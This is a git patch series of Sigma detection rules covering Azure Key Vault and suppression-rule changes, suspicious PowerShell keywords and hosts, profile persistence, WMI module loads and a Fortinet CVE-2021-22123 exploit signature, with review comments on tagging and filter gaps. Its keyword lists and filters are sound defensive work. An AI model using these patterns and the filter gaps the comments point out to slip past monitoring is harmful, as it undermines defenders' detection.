@@ -0,0 +1,23 @@ +title: Azure Application Security Group Modified or Deleted +id: 835747f1-9329-40b5-9cc3-97d465754ce6 +description: Identifies when a application security group is modified or deleted. +author: Austin Songer +status: experimental +date: 2021/08/16 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - MICROSOFT.NETWORK/APPLICATIONSECURITYGROUPS/WRITE + - MICROSOFT.NETWORK/APPLICATIONSECURITYGROUPS/DELETE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Application security group being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Application security group modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 824d64a9ce37f10cd74f83186dc1da520865b951 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 16 Aug 2021 23:41:43 -0500 Subject: [PATCH 0416/1367] Create azure_key_vault_modified_or_deleted.yml --- .../azure_key_vault_modified_or_deleted.yml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 rules/cloud/azure/azure_key_vault_modified_or_deleted.yml diff --git a/rules/cloud/azure/azure_key_vault_modified_or_deleted.yml b/rules/cloud/azure/azure_key_vault_modified_or_deleted.yml new file mode 100644 index 00000000..f019e0d4 --- /dev/null +++ b/rules/cloud/azure/azure_key_vault_modified_or_deleted.yml 
@@ -0,0 +1,28 @@ +title: Azure Key Vault Modified or Deleted. +id: 459a2970-bb84-4e6a-a32e-ff0fbd99448d +description: Identifies when a key vault is modified or deleted. +author: Austin Songer +status: experimental +date: 2021/08/16 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - MICROSOFT.KEYVAULT/VAULTS/WRITE + - MICROSOFT.KEYVAULT/VAULTS/DELETE + - MICROSOFT.KEYVAULT/VAULTS/DEPLOY/ACTION + - MICROSOFT.KEYVAULT/VAULTS/ACCESSPOLICIES/WRITE + condition: selection +level: medium +tags: + - attack.impact + - attack.credential_access + - attack.t1552 + - attack.t1552.001 +falsepositives: + - Key Vault being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Key Vault modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 758293e2f97d9281a627c9049c4c86d1ec599f9c Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 16 Aug 2021 23:42:15 -0500 Subject: [PATCH 0417/1367] Delete azure_application_security_group_modified_or_deleted.yml --- ...ion_security_group_modified_or_deleted.yml | 23 ------------------- 1 file changed, 23 deletions(-) delete mode 100644 rules/cloud/azure/azure_application_security_group_modified_or_deleted.yml diff --git a/rules/cloud/azure/azure_application_security_group_modified_or_deleted.yml b/rules/cloud/azure/azure_application_security_group_modified_or_deleted.yml deleted file mode 100644 index 686380ee..00000000 --- a/rules/cloud/azure/azure_application_security_group_modified_or_deleted.yml +++ /dev/null 
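Review bot: The title `Azure Key Vault Modified or Deleted.` ends with a period, unlike every other title in this series; drop it (`title: Azure Key Vault Modified or Deleted`). The `attack.t1552.001` tag (Unsecured Credentials: Credentials In Files) does not describe vault write/delete operations; if the credential-access angle is `MICROSOFT.KEYVAULT/VAULTS/ACCESSPOLICIES/WRITE`, i.e. granting a principal access to the vault's contents, the parent `attack.t1552` or `attack.t1555` is the closer mapping, and that operation is arguably worth its own rule at a higher level rather than sharing `level: medium` with routine vault property edits.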
@@ -1,23 +0,0 @@ -title: Azure Application Security Group Modified or Deleted -id: 835747f1-9329-40b5-9cc3-97d465754ce6 -description: Identifies when a application security group is modified or deleted. -author: Austin Songer -status: experimental -date: 2021/08/16 -references: - - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations -logsource: - service: azure.activitylogs -detection: - selection: - properties.message: - - MICROSOFT.NETWORK/APPLICATIONSECURITYGROUPS/WRITE - - MICROSOFT.NETWORK/APPLICATIONSECURITYGROUPS/DELETE - condition: selection -level: medium -tags: - - attack.impact -falsepositives: - - Application security group being modified or deleted may be performed by a system administrator. - - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Application security group modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 7abceb07cedf9d79ef35f2ea97ea9d437a2c7c39 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 16 Aug 2021 23:50:56 -0500 Subject: [PATCH 0418/1367] Create azure_vault_key_modified_or_deleted.yml --- .../azure_vault_key_modified_or_deleted.yml | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 rules/cloud/azure/azure_vault_key_modified_or_deleted.yml diff --git a/rules/cloud/azure/azure_vault_key_modified_or_deleted.yml b/rules/cloud/azure/azure_vault_key_modified_or_deleted.yml new file mode 100644 index 00000000..cfc56d8f --- /dev/null +++ b/rules/cloud/azure/azure_vault_key_modified_or_deleted.yml 
@@ -0,0 +1,30 @@ +title: Azure Key Modified or Deleted +id: 80eeab92-0979-4152-942d-96749e11df40 +description: Identifies when a key is modified or deleted in Azure. +author: Austin Songer +status: experimental +date: 2021/08/16 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - MICROSOFT.KEYVAULT/VAULTS/KEYS/UPDATE/ACTION + - MICROSOFT.KEYVAULT/VAULTS/KEYS/CREATE + - MICROSOFT.KEYVAULT/VAULTS/KEYS/CREATE/ACTION + - MICROSOFT.KEYVAULT/VAULTS/KEYS/IMPORT/ACTION + - MICROSOFT.KEYVAULT/VAULTS/KEYS/RECOVER/ACTION + - MICROSOFT.KEYVAULT/VAULTS/KEYS/RESTORE/ACTION + - MICROSOFT.KEYVAULT/VAULTS/KEYS/DELETE + - MICROSOFT.KEYVAULT/VAULTS/KEYS/BACKUP/ACTION + - MICROSOFT.KEYVAULT/VAULTS/KEYS/PURGE/ACTION + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Key being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Key modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 1fcc1701b73150ab61b1e2e3546cfdc597ed481a Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 16 Aug 2021 23:54:57 -0500 Subject: [PATCH 0419/1367] Create azure_keyvault_secrets_modified_or_deleted.yml --- ...e_keyvault_secrets_modified_or_deleted.yml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 rules/cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml diff --git a/rules/cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml b/rules/cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml new file mode 100644 index 00000000..d63ba3b5 --- /dev/null +++ b/rules/cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml 
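Review bot: `MICROSOFT.KEYVAULT/VAULTS/KEYS/BACKUP/ACTION`, `.../KEYS/CREATE` and `.../KEYS/IMPORT/ACTION` are neither modifications nor deletions of an existing key — backup exports key material, which is the most sensitive event in the list, and create/import add keys — so the description `Identifies when a key is modified or deleted in Azure.` undersells what the rule matches. Either broaden the wording (`Identifies when a Key Vault key is created, imported, backed up, modified or deleted.`) or split `BACKUP/ACTION` into its own rule with `attack.credential_access` and a higher level, so an analyst is not triaging a key export at the same priority as a routine key update.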
@@ -0,0 +1,28 @@ +title: Azure Keyvault Secrets Modified or Deleted +id: b831353c-1971-477b-abb6-2828edc3bca1 +description: Identifies when secrets are modified or deleted in Azure. +author: Austin Songer +status: experimental +date: 2021/08/16 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - MICROSOFT.KEYVAULT/VAULTS/SECRETS/DELETE + - MICROSOFT.KEYVAULT/VAULTS/SECRETS/BACKUP/ACTION + - MICROSOFT.KEYVAULT/VAULTS/SECRETS/PURGE/ACTION + - MICROSOFT.KEYVAULT/VAULTS/SECRETS/UPDATE/ACTION + - MICROSOFT.KEYVAULT/VAULTS/SECRETS/RECOVER/ACTION + - MICROSOFT.KEYVAULT/VAULTS/SECRETS/RESTORE/ACTION + - MICROSOFT.KEYVAULT/VAULTS/SECRETS/SETSECRET/ACTION + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Secrets being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 84e96d5b4f3c96c493fd9456526d7a22562cf2d2 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Tue, 17 Aug 2021 00:04:00 -0500 Subject: [PATCH 0420/1367] Create azure_suppression_rule_created.yml --- .../azure/azure_suppression_rule_created.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/cloud/azure/azure_suppression_rule_created.yml diff --git a/rules/cloud/azure/azure_suppression_rule_created.yml b/rules/cloud/azure/azure_suppression_rule_created.yml new file mode 100644 index 00000000..1c8361af --- /dev/null +++ b/rules/cloud/azure/azure_suppression_rule_created.yml 
@@ -0,0 +1,24 @@ +title: Azure Suppression Rule Created +id: 92cc3e5d-eb57-419d-8c16-5c63f325a401 +description: Identifies when a suppression rule is created in Azure. Adversary's could attempt this to evade detection. +author: Austin Songer +status: experimental +date: 2021/08/16 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations + - + - +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - MICROSOFT.SECURITY/ALERTSSUPPRESSIONRULES/WRITE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Suppression Rule being created may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Suppression Rule created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 9986515b59ab87b5705510a8c5ae4e21963e19bb Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Tue, 17 Aug 2021 00:04:11 -0500 Subject: [PATCH 0421/1367] Update azure_suppression_rule_created.yml --- rules/cloud/azure/azure_suppression_rule_created.yml | 2 -- 1 file changed, 2 deletions(-) diff --git a/rules/cloud/azure/azure_suppression_rule_created.yml b/rules/cloud/azure/azure_suppression_rule_created.yml index 1c8361af..be4d70d3 100644 --- a/rules/cloud/azure/azure_suppression_rule_created.yml +++ b/rules/cloud/azure/azure_suppression_rule_created.yml @@ -6,8 +6,6 @@ status: experimental date: 2021/08/16 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations - - - - logsource: service: azure.activitylogs detection: From 80b3acfce970f2e351f0d216e3fa70e944dc9867 Mon Sep 17 00:00:00 2001 
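Review bot: The only tag is `attack.impact`, yet the description itself says an adversary would create a suppression rule to evade detection; that is Defense Evasion, specifically Impair Defenses: Disable or Modify Tools, so the tags should read `- attack.defense_evasion` and `- attack.t1562.001` (instead of, or alongside, impact). Since a write to `MICROSOFT.SECURITY/ALERTSSUPPRESSIONRULES` silences Security Center alerts for the whole scope it covers, `level: medium` also looks low for this event compared with other telemetry-tampering rules; `high` seems more consistent, though that is a judgement call.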
From: Florian Roth Date: Tue, 17 Aug 2021 12:03:49 +0200 Subject: [PATCH 0422/1367] fix: false positive with Xen / Oracle scripts --- rules/windows/powershell/powershell_suspicious_keywords.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/powershell/powershell_suspicious_keywords.yml b/rules/windows/powershell/powershell_suspicious_keywords.yml index c363bf38..2f672aea 100644 --- a/rules/windows/powershell/powershell_suspicious_keywords.yml +++ b/rules/windows/powershell/powershell_suspicious_keywords.yml @@ -3,7 +3,7 @@ id: 1f49f2ab-26bc-48b3-96cc-dcffbc93eadf status: experimental description: Detects keywords that could indicate the use of some PowerShell exploitation framework date: 2019/02/11 -modified: 2021/06/10 +modified: 2021/08/17 author: Florian Roth, Perez Diego (@darkquassar) references: - https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462 @@ -29,7 +29,7 @@ detection: - "Runtime.InteropServices.DllImportAttribute" - "SuspendThread" - "rundll32" - - "FromBase64" + # - "FromBase64" - "Invoke-WMIMethod" - "http://127.0.0.1" condition: keywords From ecdcd8f843545c35aab18dbe45cdb5b968b99654 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Tue, 17 Aug 2021 08:30:10 -0500 Subject: [PATCH 0423/1367] Rename azure_key_vault_modified_or_deleted.yml to azure_keyvault_modified_or_deleted.yml --- ...fied_or_deleted.yml => azure_keyvault_modified_or_deleted.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/cloud/azure/{azure_key_vault_modified_or_deleted.yml => azure_keyvault_modified_or_deleted.yml} (100%) diff --git a/rules/cloud/azure/azure_key_vault_modified_or_deleted.yml b/rules/cloud/azure/azure_keyvault_modified_or_deleted.yml similarity index 100% rename from rules/cloud/azure/azure_key_vault_modified_or_deleted.yml rename to rules/cloud/azure/azure_keyvault_modified_or_deleted.yml From 16e0def41d3aab4f7fa73df2330adb36289be131 Mon Sep 17 00:00:00 2001 
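Review bot: The fix comments out `- "FromBase64"` in place instead of removing it, leaving a dead entry in the keyword list with no record of why; someone will eventually uncomment it and re-introduce the Xen/Oracle false positive the commit message mentions. Either delete the line or carry the reason in the comment, e.g. `# - "FromBase64"  # removed 2021/08/17: FPs from Xen / Oracle management scripts`, so the history is visible in the rule itself and not only in git.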
From: Austin Songer Date: Tue, 17 Aug 2021 08:31:22 -0500 Subject: [PATCH 0424/1367] Update and rename azure_vault_key_modified_or_deleted.yml to azure_keyvault_key_modified_or_deleted.yml --- ...deleted.yml => azure_keyvault_key_modified_or_deleted.yml} | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename rules/cloud/azure/{azure_vault_key_modified_or_deleted.yml => azure_keyvault_key_modified_or_deleted.yml} (91%) diff --git a/rules/cloud/azure/azure_vault_key_modified_or_deleted.yml b/rules/cloud/azure/azure_keyvault_key_modified_or_deleted.yml similarity index 91% rename from rules/cloud/azure/azure_vault_key_modified_or_deleted.yml rename to rules/cloud/azure/azure_keyvault_key_modified_or_deleted.yml index cfc56d8f..32227e46 100644 --- a/rules/cloud/azure/azure_vault_key_modified_or_deleted.yml +++ b/rules/cloud/azure/azure_keyvault_key_modified_or_deleted.yml @@ -1,6 +1,6 @@ -title: Azure Key Modified or Deleted +title: Azure Keyvault Key Modified or Deleted id: 80eeab92-0979-4152-942d-96749e11df40 -description: Identifies when a key is modified or deleted in Azure. +description: Identifies when a Keyvault Key is modified or deleted in Azure. author: Austin Songer status: experimental date: 2021/08/16 From 23d04771206a24c6dc67e70510aca704202f8e7b Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Tue, 17 Aug 2021 08:42:41 -0500 Subject: [PATCH 0425/1367] Update azure_keyvault_secrets_modified_or_deleted.yml --- .../cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/rules/cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml b/rules/cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml index d63ba3b5..d8a15e15 100644 --- a/rules/cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml +++ b/rules/cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml 
@@ -22,6 +22,9 @@ detection: level: medium tags: - attack.impact + - attack.credential_access + - attack.t1552 + - attack.t1552.001 falsepositives: - Secrets being modified or deleted may be performed by a system administrator. - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. From 309e71491b4e0bd84586e00a384432fc5aac4cd6 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Tue, 17 Aug 2021 08:44:39 -0500 Subject: [PATCH 0426/1367] Update azure_keyvault_key_modified_or_deleted.yml --- rules/cloud/azure/azure_keyvault_key_modified_or_deleted.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/rules/cloud/azure/azure_keyvault_key_modified_or_deleted.yml b/rules/cloud/azure/azure_keyvault_key_modified_or_deleted.yml index 32227e46..06ece7f9 100644 --- a/rules/cloud/azure/azure_keyvault_key_modified_or_deleted.yml +++ b/rules/cloud/azure/azure_keyvault_key_modified_or_deleted.yml @@ -24,6 +24,9 @@ detection: level: medium tags: - attack.impact + - attack.credential_access + - attack.t1552 + - attack.t1552.001 falsepositives: - Key being modified or deleted may be performed by a system administrator. - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. From 5fa5a412d5679c18e7daf53de2c0bf14b32c1e93 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 18 Aug 2021 09:49:34 +0200 Subject: [PATCH 0427/1367] fix: FPs with [reflection.assembly]::Load --- .../windows/powershell/powershell_suspicious_keywords.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/rules/windows/powershell/powershell_suspicious_keywords.yml b/rules/windows/powershell/powershell_suspicious_keywords.yml index c09396e0..991dfc3c 100644 --- a/rules/windows/powershell/powershell_suspicious_keywords.yml +++ b/rules/windows/powershell/powershell_suspicious_keywords.yml 
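Review bot: The added `attack.t1552.001` tag looks mis-mapped: T1552 (Unsecured Credentials) and its .001 sub-technique (Credentials In Files) describe an adversary reading credentials lying around in files, whereas this rule fires on a Key Vault secret being modified or deleted, which the existing `attack.impact` tag already covers. The same three tags are added to the keyvault_key rule in the next hunk of this commit set and the same concern applies there. Unless the selection (outside this hunk) also matches secret/key reads or exports, I would keep only `attack.credential_access` at most and drop the two T1552 tags, or tag a technique that matches destruction/modification.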
@@ -3,7 +3,7 @@ id: 1f49f2ab-26bc-48b3-96cc-dcffbc93eadf status: experimental description: Detects keywords that could indicate the use of some PowerShell exploitation framework date: 2019/02/11 -modified: 2021/08/17 +modified: 2021/08/18 author: Florian Roth, Perez Diego (@darkquassar) references: - https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462 @@ -20,9 +20,9 @@ logsource: definition: 'It is recommended to use the new "Script Block Logging" of PowerShell v5 https://adsecurity.org/?p=2277. Monitor for EventID 4104' detection: keywords: - - "System.Reflection.Assembly.Load" - - "[System.Reflection.Assembly]::Load" - - "[Reflection.Assembly]::Load" + - "System.Reflection.Assembly.Load($" + - "[System.Reflection.Assembly]::Load($" + - "[Reflection.Assembly]::Load($" - "System.Reflection.AssemblyName" - "Reflection.Emit.AssemblyBuilderAccess" - "Runtime.InteropServices.DllImportAttribute" From 8d9f2e059ad2f24a50d8d8fd2b9154c7181e02ef Mon Sep 17 00:00:00 2001 From: Bhabesh Rai Date: Wed, 18 Aug 2021 17:28:57 +0545 Subject: [PATCH 0428/1367] Added rule for zero day CVE-2021-22123 in Fortinet WAFs --- .../web_fortinet_cve_2021_22123_exploit.yml | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 rules/web/web_fortinet_cve_2021_22123_exploit.yml diff --git a/rules/web/web_fortinet_cve_2021_22123_exploit.yml b/rules/web/web_fortinet_cve_2021_22123_exploit.yml new file mode 100644 index 00000000..42615b9d --- /dev/null +++ b/rules/web/web_fortinet_cve_2021_22123_exploit.yml 
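Review bot: Narrowing the three keywords to `...::Load($` fixes the FP but also silently drops the whitespace form `Load( $` and any call that passes an expression rather than a bare variable, so the rule's description ("Detects keywords that could indicate...") now overstates what it matches. Since the commit subject names the FP as `[reflection.assembly]::Load` on legitimate scripts, a `filter:` selection on those known-good invocations combined as `condition: keywords and not filter` would preserve the broad match. At minimum a comment next to the three entries, e.g. `# narrowed to Load($ to avoid FPs with static assembly loads; loosen if coverage matters more`, records the trade-off for the next maintainer.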
@@ -0,0 +1,30 @@ +title: Fortinet CVE-2021-22123 Exploitation +description: Detects CVE-2021-22123 exploitation attempt against Fortinet WAFs +id: f425637f-891c-4191-a6c4-3bb1b70513b4 +references: + - https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection +author: Bhabesh Raj +date: 2021/08/18 +tags: + - attack.initial_access + - attack.t1190 +logsource: + category: webserver +detection: + selection: + c-uri|contains: + - '/api/v2.0/user/remoteserver.saml' + cs-method: + - POST + content-type|startswith: + - 'multipart/form-data;' + content-disposition|contains: + - '`' + condition: selection +fields: + - client_ip + - url + - response +falsepositives: + - Unknown +level: critical From 6a282ad24a13b6229cf68e5d5524d7941856bab5 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 18 Aug 2021 13:56:14 +0200 Subject: [PATCH 0429/1367] fix many FP --- .../powershell_alternate_powershell_hosts.yml | 8 ++++---- .../powershell/powershell_renamed_powershell.yml | 11 ++++++----- 2 files changed, 10 insertions(+), 9 deletions(-) diff --git a/rules/windows/powershell/powershell_alternate_powershell_hosts.yml b/rules/windows/powershell/powershell_alternate_powershell_hosts.yml index 22389518..65aa3a58 100644 --- a/rules/windows/powershell/powershell_alternate_powershell_hosts.yml +++ b/rules/windows/powershell/powershell_alternate_powershell_hosts.yml @@ -2,9 +2,9 @@ action: global title: Alternate PowerShell Hosts id: 64e8e417-c19a-475a-8d19-98ea705394cc description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe -status: experimental +status: test date: 2019/08/11 -modified: 2021/08/16 +modified: 2021/08/18 author: Roberto Rodriguez @Cyb3rWard0g references: - https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190815181010.html 
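Review bot: The new rule has no `status:` field, and with `falsepositives: Unknown` and `level: critical` a `status: experimental` line is the minimum the rest of the repository carries. The `fields:` list (`client_ip`, `url`, `response`) uses names that do not match the `c-uri` / `cs-method` naming the selection relies on, so backends that take those field names literally will emit empty columns; `c-ip`, `c-uri` and `sc-status` would be consistent with the selection. `content-type` and `content-disposition` are multipart request headers that plain webserver access logs generally do not record, so the `category: webserver` logsource may never supply them; a `definition:` line stating that request-header logging (WAF or reverse-proxy level) is required would tell users up front why the rule stays silent.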
@@ -26,7 +26,7 @@ detection: EventID: 4103 ContextInfo: '*' filter: - ContextInfo: 'powershell.exe' + ContextInfo|endswith: 'powershell.exe' condition: selection and not filter --- logsource: @@ -38,5 +38,5 @@ detection: EventID: 400 HostApplication: '*' filter: - HostApplication: 'powershell.exe' + HostApplication|endswith: 'powershell.exe' condition: selection and not filter \ No newline at end of file diff --git a/rules/windows/powershell/powershell_renamed_powershell.yml b/rules/windows/powershell/powershell_renamed_powershell.yml index 97bde1b5..5b6304ef 100644 --- a/rules/windows/powershell/powershell_renamed_powershell.yml +++ b/rules/windows/powershell/powershell_renamed_powershell.yml @@ -1,12 +1,12 @@ -title: Renamed Powershell +title: Renamed Powershell Under Powershell Channel id: 30a8cb77-8eb3-4cfb-8e79-ad457c5a4592 description: Detects renamed powershell -status: experimental +status: test references: - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse author: Harish Segar, frack113 date: 2020/06/29 -modified: 2021/07/04 +modified: 2021/08/18 tags: - attack.execution - attack.t1086 @@ -17,10 +17,11 @@ logsource: detection: selection: EventID: 400 - HostName: "ConsoleHost" + HostName: ConsoleHost filter: HostApplication|startswith: - - "powershell" + - powershell.exe + - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe condition: selection and not filter falsepositives: - unknown From 48d0846b53d1bf22cbc9b24a0fe3ea1bd0d0adae Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 18 Aug 2021 14:29:50 +0200 Subject: [PATCH 0430/1367] add powershell_trigger_profiles --- .../powershell_trigger_profiles.yml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 rules/windows/powershell/powershell_trigger_profiles.yml diff --git a/rules/windows/powershell/powershell_trigger_profiles.yml b/rules/windows/powershell/powershell_trigger_profiles.yml new file mode 100644 index 00000000..58321ba2 --- /dev/null 
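Review bot: In the renamed_powershell hunk the `HostApplication|startswith` filter only lists the System32 host, so the 32-bit host under `C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe`, and any invocation whose HostApplication starts with a quote character, will still be reported as a "renamed" PowerShell. Adding the SysWOW64 path to the filter is a one-line fix; if those are accepted as expected noise instead, they belong under `falsepositives:` rather than `- unknown`, especially now that `status` moves to `test`. The two `|endswith: 'powershell.exe'` filters in the alternate_powershell_hosts hunks on this line are revisited by a later commit in this set, so I have not repeated that point here.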
+++ b/rules/windows/powershell/powershell_trigger_profiles.yml @@ -0,0 +1,29 @@ +title: Powershell Trigger Profiles by Add_Content +id: 05b3e303-faf0-4f4a-9b30-46cc13e69152 +status: experimental +author: frack113 +date: 2021/08/18 +description: Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles. +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md +tags: + - attack.privilege_escalation + - attack.t1546.013 +logsource: + product: windows + service: powershell + definition: EnableScriptBlockLogging must be set to enable +detection: + selection: + EventID: 4104 + ScriptBlockText|contains|all: + - 'Add-Content' + - '$profile' + - '-Value' + ScriptBlockText|contains: + - 'Start-Process' + - '""' #cleanup action + condition: selection +falsepositives: + - Unknown +level: medium \ No newline at end of file From 2d05eda1beed0c81445d59ee0cdf9d152cffe619 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 18 Aug 2021 15:18:29 +0200 Subject: [PATCH 0431/1367] fix ContextInfo FP --- .../powershell/powershell_alternate_powershell_hosts.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/windows/powershell/powershell_alternate_powershell_hosts.yml b/rules/windows/powershell/powershell_alternate_powershell_hosts.yml index 65aa3a58..582da352 100644 --- a/rules/windows/powershell/powershell_alternate_powershell_hosts.yml +++ b/rules/windows/powershell/powershell_alternate_powershell_hosts.yml @@ -21,12 +21,13 @@ level: medium logsource: product: windows service: powershell + definition: ModuleLogging must be enable detection: selection: EventID: 4103 ContextInfo: '*' filter: - ContextInfo|endswith: 'powershell.exe' + ContextInfo|contains: 'powershell.exe' # Host Application=...powershell.exe or Application hote=...powershell.exe in French Win10 event condition: selection and not filter --- logsource: 
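Review bot: The second `ScriptBlockText|contains:` list includes `'""'`, and two consecutive double quotes appear in a large share of ordinary script blocks, so that entry makes the OR-list effectively always true and the `Start-Process` entry adds nothing; the rule reduces to the `contains|all` of `Add-Content`, `$profile`, `-Value`. If the intent is to catch the atomic test's cleanup step, that should be a separate selection (e.g. `selection_cleanup`) combined explicitly in the condition rather than folded into the same OR-list. Two smaller points: `definition: EnableScriptBlockLogging must be set to enable` reads better as `definition: Script block logging (EnableScriptBlockLogging) must be enabled`, and since the description says the behaviour yields persistence, `attack.persistence` belongs in `tags:` alongside `attack.privilege_escalation` for T1546.013.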
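Review bot: Switching the filter to `ContextInfo|contains: 'powershell.exe'` suppresses the event whenever that string appears anywhere in the ContextInfo blob, not only on the `Host Application=` line the inline comment targets, so an alternate host that merely passes `powershell.exe` in its command line or script path is filtered out too. Anchoring on the field label keeps the localisation fix without the blind spot, e.g. a two-entry list `ContextInfo|contains: - 'Host Application=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'` and the French `Application hote=` equivalent with the same path; the rule's own 4103 events carry the full host path, so the prefix is available. The new `definition: ModuleLogging must be enable` line should read `definition: ModuleLogging must be enabled`.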
From 44013e25c8f7b0185ac5a47a4c6a6d00bf080699 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 18 Aug 2021 17:26:57 +0200 Subject: [PATCH 0432/1367] fix: FPs with WMIADAP.exe --- rules/windows/image_load/sysmon_wmi_module_load.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/image_load/sysmon_wmi_module_load.yml b/rules/windows/image_load/sysmon_wmi_module_load.yml index 9203768f..e500bb6f 100755 --- a/rules/windows/image_load/sysmon_wmi_module_load.yml +++ b/rules/windows/image_load/sysmon_wmi_module_load.yml @@ -37,6 +37,7 @@ detection: - '\ngentask.exe' # c:\Windows\Microsoft.NET\Framework(64)\ngentask.exe - '\windows\system32\taskhostw.exe' # c:\windows\system32\taskhostw.exe - '\windows\system32\MoUsoCoreWorker.exe' # c:\windows\System32\MoUsoCoreWorker.exe on win10 20H04 at least + - '\windows\system32\wbem\WMIADAP.exe' # https://github.com/SigmaHQ/sigma/issues/1871 condition: selection and not filter fields: - ComputerName From 768855e6d6702cddab0abf621dbb539d6ce96378 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Wed, 18 Aug 2021 18:17:53 +0200 Subject: [PATCH 0433/1367] update modified after FP fix --- rules/windows/image_load/sysmon_wmi_module_load.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/image_load/sysmon_wmi_module_load.yml b/rules/windows/image_load/sysmon_wmi_module_load.yml index e500bb6f..57d3ade2 100755 --- a/rules/windows/image_load/sysmon_wmi_module_load.yml +++ b/rules/windows/image_load/sysmon_wmi_module_load.yml @@ -3,7 +3,7 @@ id: 671bb7e3-a020-4824-a00e-2ee5b55f385e description: Detects non wmiprvse loading WMI modules status: experimental date: 2019/08/10 -modified: 2021/06/15 +modified: 2021/08/18 author: Roberto Rodriguez @Cyb3rWard0g references: - https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190811201010.html From 36406d57818025e653254c770868c949411528b0 Mon Sep 17 00:00:00 2001 
